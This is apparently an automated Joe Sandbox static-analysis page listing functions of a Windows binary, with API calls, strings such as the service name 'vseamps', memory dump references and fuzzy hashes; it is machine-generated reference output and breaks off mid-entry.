Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction ID: 939e1951021ac32239a98278383650b1560c4a87fea8e277fdca239b4ddbef52
Opcode Fuzzy Hash: 3eee3a1980859deabbe81d62853d66f73e7f8938a0b91b292409d40ad6238f27
Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/remove, xrefs: 000000014000157E
/service, xrefs: 000000014000153F
vseamps, xrefs: 0000000140001538

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

GetLastActivePopup, xrefs: 000000014000F094
GetUserObjectInformationA, xrefs: 000000014000F0E9
USER32.DLL, xrefs: 000000014000F03B
GetActiveWindow, xrefs: 000000014000F075
MessageBoxA, xrefs: 000000014000F054
GetProcessWindowStation, xrefs: 000000014000F10D

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

..., xrefs: 0000000140009431
<program name unknown>, xrefs: 00000001400093D9
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
Runtime Error!Program: , xrefs: 000000014000938D

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFE13202630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE1320264C
RtlCaptureContext.KERNEL32 ref: 00007FFE13202679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE13202693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE132026D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE13202728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE13202745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE13202750

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: b45511375f6b95b5bbe607e6132c8178157d0ad52ffacfbbeb251530e3bfe459
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: 5A316D72608F818AEB60AF61E8403ED7361FBA5758F44403ADA4E67BA5DF38C648C710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFE132076E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE13207759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE13207771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE132077AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE132077E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE132077EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE132077FA

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 3fcb55011bcafaea8dad090f616b4d27293f7d5aa6a5ab4bdd55e21732c7fdc0
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: C7316132618F8189DB60DF26E8402AE73A4FBE5764F500176EA9D53B65DF3CD149CB00

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFE13210248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE13210497
RaiseException.KERNEL32 ref: 00007FFE132104A8

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: fe5263e204a04b5544e0632a75cabc386e24d3d3a562b7af1947b06aa55c5468
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 19B13473A00B898BEB15DF2AC98636C7BA0F784B58F14C962DA5D837A9CB3DD451C700

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311230963.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2311248588.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFE1320A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2311314685.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000004.00000002.2311271276.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311341205.00007FFE13212000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311366130.00007FFE1321D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2311387307.00007FFE1321F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe13200000_qWXt7a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: 811884ade670e16a3f1d35e87278fc619aa27cec87588dbf54acea3412aba70e
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: 5051D922B08B8189FB20EB77A8441AE7BA4BB947A4F544274EE5D37AA5CE3CD405C700

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000004.00000002.2311167840.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2311126946.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
